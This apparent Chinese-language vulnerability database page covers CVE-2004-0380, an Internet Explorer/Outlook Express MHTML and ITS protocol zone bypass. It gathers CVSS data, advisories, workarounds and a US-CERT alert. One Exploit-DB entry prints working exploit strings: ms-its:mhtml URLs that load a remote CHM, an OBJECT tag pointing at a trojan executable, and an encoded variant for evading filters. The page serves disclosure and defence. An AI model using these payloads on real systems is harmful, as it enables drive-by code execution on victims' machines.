CVE-2004-0380
CVSS10.0
发布时间 :2004-05-04 00:00:00
修订时间 :2008-09-10 15:26:08
NMCOEPS    

[原文]The MHTML protocol handler in Microsoft Outlook Express 5.5 SP2 through Outlook Express 6 SP1 allows remote attackers to bypass domain restrictions and execute arbitrary code, as demonstrated on Internet Explorer using script in a compiled help (CHM) file that references the InfoTech Storage (ITS) protocol handlers such as (1) ms-its, (2) ms-itss, (3) its, or (4) mk:@MSITStore, aka the "MHTML URL Processing Vulnerability."


[CNNVD]Microsoft Internet Explorer MT-ITS协议区域绕过漏洞(CNNVD-200405-008)

        
        Microsoft Internet Explorer是一款流行的WEB浏览器。
        Microsoft Internet Explorer在处理MS-ITS InfoTech协议URL处理时存在问题,远程攻击者可以利用这个漏洞构建恶意页面,诱使用户处理,以系统权限执行恶意代码。
        此漏洞可利用MS-ITS InfoTech协议URI处理器触发,使用这个协议可迫使浏览器通过重定向一个不存在的MHTML文件(使用其他已知漏洞)转到本地电脑安全域,在这种情况下,包含的恶意内容将会以本地电脑权限执行,如恶意CHM文件。组合其他问题,攻击者构建恶意页面,诱使用户访问,可自动下载和执行任意程序。
        根据报告这个漏洞已经被Trojan.Ibiza利用使用。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:outlook_express:6.0Microsoft outlook_express 6.0
cpe:/a:microsoft:outlook_express:5.5Microsoft outlook_express 5.5

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:990Microsoft Outlook Express v6.0 MHTML URL Processing Vulnerability
oval:org.mitre.oval:def:882Microsoft Outlook Express v5.5,SP2 MHTML URL Processing Vulnerability
oval:org.mitre.oval:def:1028Microsoft Outlook Express v6.0 for Server 2003 MHTML URL Processing Vulnerability
oval:org.mitre.oval:def:1010Microsoft Outlook Express v6.0,SP1 MHTML URL Processing Vulnerability
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0380
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0380
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200405-008
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/323070
(UNKNOWN)  CERT-VN  VU#323070
http://www.us-cert.gov/cas/techalerts/TA04-104A.html
(UNKNOWN)  CERT  TA04-104A
http://www.securityfocus.com/archive/1/358913
(VENDOR_ADVISORY)  BUGTRAQ  20040328 IE ms-its: and mk:@MSITStore: vulnerability
http://www.securityfocus.com/archive/1/354447
(VENDOR_ADVISORY)  BUGTRAQ  20040219 Microsoft Internet Explorer Unspecified CHM File Processing Arbitrary Code Execution Vulnerability (bid 9658)
http://www.microsoft.com/technet/security/bulletin/MS04-013.mspx
(VENDOR_ADVISORY)  MS  MS04-013
http://xforce.iss.net/xforce/xfdb/15705
(VENDOR_ADVISORY)  XF  outlook-mhtml-execute-code(15705)
http://www.securityfocus.com/bid/9658
(UNKNOWN)  BID  9658
http://www.k-otik.net/bugtraq/02.18.InternetExplorer.php
(UNKNOWN)  MISC  http://www.k-otik.net/bugtraq/02.18.InternetExplorer.php
http://www.securityfocus.com/bid/9105
(UNKNOWN)  BID  9105
http://secunia.com/advisories/10523
(UNKNOWN)  SECUNIA  10523

- 漏洞信息

Microsoft Internet Explorer MT-ITS协议区域绕过漏洞
危急 访问验证错误
2004-05-04 00:00:00 2005-10-20 00:00:00
远程  
        
        Microsoft Internet Explorer是一款流行的WEB浏览器。
        Microsoft Internet Explorer在处理MS-ITS InfoTech协议URL处理时存在问题,远程攻击者可以利用这个漏洞构建恶意页面,诱使用户处理,以系统权限执行恶意代码。
        此漏洞可利用MS-ITS InfoTech协议URI处理器触发,使用这个协议可迫使浏览器通过重定向一个不存在的MHTML文件(使用其他已知漏洞)转到本地电脑安全域,在这种情况下,包含的恶意内容将会以本地电脑权限执行,如恶意CHM文件。组合其他问题,攻击者构建恶意页面,诱使用户访问,可自动下载和执行任意程序。
        根据报告这个漏洞已经被Trojan.Ibiza利用使用。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 更名下面的注册表条目:
        HKEY_CLASSES_ROOT\PROTOCOLS\Handler\ms-its
        不过如果使用其他名进行处理也会导致此漏洞的产生。
        厂商补丁:
        Microsoft
        ---------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.microsoft.com/windows/ie/default.asp

- 漏洞信息 (23400)

Microsoft Outlook Express 6.0 MHTML Forced File Execution Vulnerability (1) (EDBID:23400)
windows remote
2003-11-25 Verified
0 Liu Die
N/A [点击下载]
source: http://www.securityfocus.com/bid/9105/info

A vulnerability has been discovered in Microsoft Outlook Express when handling MHTML file and res URIs that could lead to an unexpected file being downloaded and executed.

The problem occurs due to the component failing to securely handle MHTML file URIs that reference a non-existent resource. The affected Outlook Express component is used by Microsoft Internet Explorer. As a result, a victim browser user may inadvertently access a page designed to load an embedded object from a malicious location. This would effectively result in the execution of attacker-supplied code within the Local Zone. The vulnerability is present even if Microsoft Outlook has been removed as the default email client.

According to Microsoft, Microsoft Internet Explorer on Windows Server 2003 is prone to attacks despite its specialized configuration.

Microsoft Windows platforms running Microsoft Outlook Express 5.5SP2, 6.0, and 6.0SP1 are reported by the vendor to be affected though the issue may also be present in earlier versions of Microsoft Outlook Express.

http://www.exploit-db.com/sploits/23400.zip		

- 漏洞信息 (23401)

Microsoft Outlook Express 6.0 MHTML Forced File Execution Vulnerability (2) (EDBID:23401)
windows remote
2003-11-25 Verified
0 Liu Die Yu
N/A [点击下载]
source: http://www.securityfocus.com/bid/9105/info
 
A vulnerability has been discovered in Microsoft Outlook Express when handling MHTML file and res URIs that could lead to an unexpected file being downloaded and executed.
 
The problem occurs due to the component failing to securely handle MHTML file URIs that reference a non-existent resource. The affected Outlook Express component is used by Microsoft Internet Explorer. As a result, a victim browser user may inadvertently access a page designed to load an embedded object from a malicious location. This would effectively result in the execution of attacker-supplied code within the Local Zone. The vulnerability is present even if Microsoft Outlook has been removed as the default email client.
 
According to Microsoft, Microsoft Internet Explorer on Windows Server 2003 is prone to attacks despite its specialized configuration.
 
Microsoft Windows platforms running Microsoft Outlook Express 5.5SP2, 6.0, and 6.0SP1 are reported by the vendor to be affected though the issue may also be present in earlier versions of Microsoft Outlook Express.
 
http://www.exploit-db.com/sploits/23401.zip		

- 漏洞信息 (23695)

Microsoft Internet Explorer 5.0.1 ITS Protocol Zone Bypass Vulnerability (EDBID:23695)
windows remote
2004-02-13 Verified
0 Anonymous
N/A [点击下载]
source: http://www.securityfocus.com/bid/9658/info

Microsoft Internet Explorer has been reported prone to a vulnerability that may permit hostile content to be interpreted in the Local Zone. 

The issue may be exploited via the ITS (InfoTech Storage) Protocol URI handler. It is possible to use this protocol to force a browser into the Local Zone by redirecting into a non-existent MHTML file (using other known vulnerabilities). In this manner, it may be possible to reference hostile content to be executed in the Local Zone, such as a malicious CHM file. The issue, in combination with other vulnerabilities, is exploitable to provide for automatic delivery and execution of an arbitrary executable. This would occur when malicious web content is rendered in Internet Explorer.

Outlook products and other components that use Internet Explorer to render HTML content also present possible attack vectors for this issue.

It should be noted that there are multiple ways to invoke the protocol handler, such as through its:, ms-its:, ms-itss: and mk:@MSITStore: URIs. It has also been reported that web browsers other than Internet Explorer may also invoke the operating system URI handlers for the ITS protocol.

It has been reported that this vulnerability is actively being exploited as an infection vector for malicious code that has been dubbed Trojan.Ibiza.

**NOTE: Microsoft has released a cumulative update for Outlook Express (MS04-013) to address the MHTML-related vulnerabilities that are commonly exploited in tandem with this issue. While MS04-013 lists the same CVE candidate name as this BID, it is not currently known if this update also addresses the distinct ITS Protocol vulnerability. However, users are advised to apply the available updates, as they will reduce exposure to existing exploits that rely on the MHTML issues to exploit this or other vulnerabilities. It should be noted that if this individual vulnerability has not been addressed by the update, there may still potentially be other attack vectors which do not rely on the MHTML issues.

**Update: Symantec has observed targeted attacks "in the wild" with confirmation that systems were compromised as a result. Users are advised to ensure that the patch has been installed and take appropriate measures to avoid future attacks using potentially unpublished and unpatched vulnerabilities. This includes disabling scripting and active content by default wherever possible (use the MSIE Zone functionality to permit scripting for content from trusted domains). Avoid visiting suspicious links, such as those included in e-mail/instant messages or other untrustworthy communications. Disable HTML e-mail, if possible.

ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm

The following example demonstrates the exploitation of this issue:

The attacker would create a script (ie; launch.html) containing a CLASSID exploit as a CHM such as:
<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='trojan.exe'>

The attacker would then utilize another script tag to execute the launch.html such as:
<IMG SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IMG
SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IMG
SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IFRAME
SRC='redirgen.php?url=URL:ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'>

Additional proof-of-concepts have been published by http-equiv and Jelmer that demonstrate different payloads:
http://www.malware.com/junk-de-lux.html
http://ip3e83566f.speed.planet.nl/security/newone/exploit.htm

Additional proof-of-concepts were provided in the "IE ms-its: and mk:@MSITStore: vulnerability" BugTraq post by Roozbeh Afrasiabi.

Jelmer also released the following proof-of-concept example which may potentially bypass some filters due to using encoded characters in the exploit string:

&#109;s-its:mhtml:file://C:\foo.mht!${PATH}/EXPLOIT.CHM::/exploit.htm

This issue is known to be exploited in the wild.		

- 漏洞信息 (F33047)

Technical Cyber Security Alert 2004-99A (PacketStormID:F33047)
2004-04-09 00:00:00
US-CERT,Art Manion  cert.org
advisory,web,arbitrary
CVE-2004-0380
[点击下载]

CERT Advisory TA04-099A - A cross-domain scripting vulnerability in Microsoft Internet Explorer (IE) could allow an attacker to execute arbitrary code with the privileges of the user running IE. The attacker could also read and manipulate data on web sites in other domains or zones.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Vulnerability in Internet Explorer ITS Protocol Handler

   Original release date: April 8, 2004
   Last revised: --
   Source: US-CERT

Systems Affected

     * Microsoft Windows systems running Internet Explorer

Overview

   A cross-domain scripting vulnerability in Microsoft Internet Explorer
   (IE) could allow an attacker to execute arbitrary code with the
   privileges of the user running IE. The attacker could also read and
   manipulate data on web sites in other domains or zones.

I. Description

   There is a cross-domain scripting vulnerability in the way ITS
   protocol handlers determine the security domain of an HTML component
   stored in a Compiled HTML Help (CHM) file. The HTML Help system
   "...uses the underlying components of Microsoft Internet Explorer to
   display help content. It supports HTML, ActiveX, Java, [and] scripting
   languages (JScript, and Microsoft Visual Basic Scripting Edition)."
   CHM files use the InfoTech Storage (ITS) format to store components
   such as HTML files, graphic files, and ActiveX objects. IE provides
   several protocol handlers that can access ITS files and individual CHM
   components: its:, ms-its:, ms-itss:, and mk:@MSITStore:. IE also has
   the ability to access parts of MIME Encapsulation of Aggregate HTML
   Documents (MHTML) using the mhtml: protocol handler.

   When IE references an inaccessible or non-existent MHTML file using
   the ITS and mhtml: protocols, the ITS protocol handlers can access a
   CHM file from an alternate source. IE incorrectly treats the CHM file
   as if it were in the same domain as the unavailable MHTML file. Using
   a specially crafted URL, an attacker can cause arbitrary script in a
   CHM file to be executed in a different domain, violating the
   cross-domain security model.

   Any programs that use the WebBrowser ActiveX control or the IE HTML
   rendering engine (MSHTML) may be affected by this vulnerability.
   Internet Explorer, Outlook, and Outlook Express are all examples of
   such programs. Any programs, including other web browsers, that use
   the IE protocol handlers (URL monikers) could function as attack
   vectors. Also, due to the way that IE determines MIME types, HTML and
   CHM files may not have the expected file name extensions (.htm/.html
   and .chm respectively).

   NOTE: Using an alternate web browser may not mitigate this
   vulnerability. It may be possible for a web browser other than IE on a
   Windows system to invoke IE to handle ITS protocol URLs.

   US-CERT is tracking this issue as VU#323070. This reference number
   corresponds to CVE candidate CAN-2004-0380.

II. Impact

   By convincing a victim to view an HTML document such as a web page or
   HTML email message, an attacker could execute script in a different
   security domain than the one containing the attacker's document. By
   causing script to be run in the Local Machine Zone, the attacker could
   execute arbitrary code with the privileges of the user running IE. The
   attacker could also read or modify data in other web sites (including
   reading cookies or content and modifying or creating content).

   Publicly available exploit code exists for this vulnerability. US-CERT
   has monitored incident reports that indicate that this vulnerability
   is being exploited. The Ibiza trojan, variants of W32/Bugbear, and
   BloodHound.Exploit.6 are some example of malicious code that exploit
   this vulnerability. It is important to note that any arbitrary
   executable payload could be delivered via this vulnerability, and
   different anti-virus vendors may identify malicious code with
   different names.

   A malicious web site or email message may contain HTML similar to the
   following:

     ms-_its:mhtml:file://C:\nosuchfile_mht!http://www.example.com//expl
     oit_chm::exploit_html

     (This URL is intentionally modified to avoid detection by
     anti-virus software.)

   In this example, HTML and script in exploit.html will be executed in
   the security context of the Local Machine Zone. It is common practice
   for exploit.html to either contain or download an executable payload
   such as a backdoor, trojan horse, virus, bot, or other malicious code.

   Note that it is possible to encode a URL in an attempt to bypass HTTP
   content inspection or anti-virus software.

III. Solution

   Currently, there is no complete solution for this vulnerability. Until
   a patch is available, consider the workarounds listed below.
   Disable ITS protocol handlers

   Disabling ITS protocol handlers appears to prevent exploitation of
   this vulnerability. Delete or rename the following registry keys:

     HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\{ms-its,ms-it
     ss,its,mk}

   Disabling these protocol handlers will significantly reduce the
   functionality of the Windows Help system and may have other unintended
   consequences. Plan to undo these changes after patches have been
   tested and installed. Follow good Internet security practices

   These recommended security practices will help to reduce exposure to
   attacks and mitigate the impact of cross-domain vulnerabilities.

     * Disable Active scripting and ActiveX controls

       NOTE: Disabling Active scripting and ActiveX controls will not
       prevent the exploitation of this vulnerability.

       Disabling Active scripting and ActiveX controls in the Internet
       and Local Machine Zones may stop certain types of attacks and will
       prevent exploitation of different cross-domain vulnerabilities.

       Disable Active scripting and ActiveX controls in any zones used to
       read HTML email.

       Disabling Active scripting and ActiveX controls in the Local
       Machine Zone will prevent malicious code that requires Active
       scripting and ActiveX controls from running. Changing these
       settings may reduce the functionality of scripts, applets, Windows
       components, or other applications. See Microsoft Knowledge Base
       Article 833633 for detailed information about security settings
       for the Local Machine Zone. Note that Service Pack 2 for Windows
       XP includes these changes.

     * Do not follow unsolicited links

       Do not click on unsolicited URLs received in email, instant
       messages, web forums, or Internet relay chat (IRC) channels.

     * Maintain updated anti-virus software

       Anti-virus software with updated virus definitions may identify
       and prevent some exploit attempts. Variations of exploits or
       attack vectors may not be detected. Do not rely solely on
       anti-virus software to defend against this vulnerability. More
       information about viruses and anti-virus vendors is available on
       the US-CERT Computer Virus Resources page.

Appendix B. References

     * Vulnerability Note VU#323070 -
       <http://www.kb.cert.org/vuls/id/323070>

     * US-CERT Computer Virus Resources -
       <http://www.us-cert.gov/other_sources/viruses.html>

     * CVE CAN-2004-0380 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0380>

     * Introduction to URL Security Zones -
       <http://msdn.microsoft.com/workshop/security/szone/overview/overvi
       ew.asp>

     * About Cross-Frame Scripting and Security -
       <http://msdn.microsoft.com/workshop/author/om/xframe_scripting_sec
       urity.asp>

     * MIME Type Determination in Internet Explorer -
       <http://msdn.microsoft.com/workshop/networking/moniker/overview/ap
       pendix_a.asp>

     * URL Monikers -
       <http://msdn.microsoft.com/workshop/networking/moniker/monikers.as
       p>

     * Asynchronous Pluggable Protocols -
       <http://msdn.microsoft.com/workshop/networking/pluggable/pluggable
       .asp>

     * Microsoft HTML Help 1.4 SDK -
       <http://msdn.microsoft.com/library/en-us/htmlhelp/html/vsconHH1Sta
       rt.asp>

     * Microsoft Knowledge Base Article 182569 -
       <http://support.microsoft.com/default.aspx?scid=182569>

     * Microsoft Knowledge Base Article 174360 -
       <http://support.microsoft.com/default.aspx?scid=174360>

     * Microsoft Knowledge Base Article 833633 -
       <http://support.microsoft.com/default.aspx?scid=833633>

     * Windows XP Service Pack 2 Technical Preview -
       <http://www.microsoft.com/technet/prodtechnol/winxppro/sp2preview.
       mspx >

     * AusCERT Update AU-2004.007 - <http://www.auscert.org.au/3990>
     _________________________________________________________________

   This vulnerability was reported by Thor Larholm.
     _________________________________________________________________

   Feedback can be directed to the author: Art Manion.
     _________________________________________________________________

   Copyright 2004 Carnegie Mellon University.

   Terms of use:

	 <http://www.us-cert.gov/legal.html>

   Revision History

   April 8, 2004: Initial release
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQFAdbqQXlvNRxAkFWARAtfuAKD0NGSDWbtITNqXKmZk7qcbJD/h2QCfRlU/
sWme3VvhRbvk9KjNUNyTsbY=
=kL0G
-----END PGP SIGNATURE-----
    

- 漏洞信息

3307
Microsoft IE showHelp() Zone Restriction Bypass

- 漏洞描述

Unknown or Incomplete

- 时间线

2004-01-02 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Microsoft Internet Explorer ITS Protocol Zone Bypass Vulnerability
Design Error 9658
Yes No
2004-02-13 12:00:00 2009-07-12 02:06:00
The discoverer of this issue is currently unknown, however this issue was reported to Symantec by Thor Larholm of PivX Solutions. Information has also been provided by Isabelle of K-OTik Security <http://www.k-otik.com>.

- 受影响的程序版本

Microsoft Internet Explorer 5.0.1 SP4
- Microsoft Windows 2000 Advanced Server SP4
- Microsoft Windows 2000 Datacenter Server SP4
- Microsoft Windows 2000 Professional SP4
- Microsoft Windows 2000 Server SP4
Microsoft Internet Explorer 5.0.1 SP3
Microsoft Internet Explorer 5.0.1 SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
Microsoft Internet Explorer 5.0.1 SP1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP2
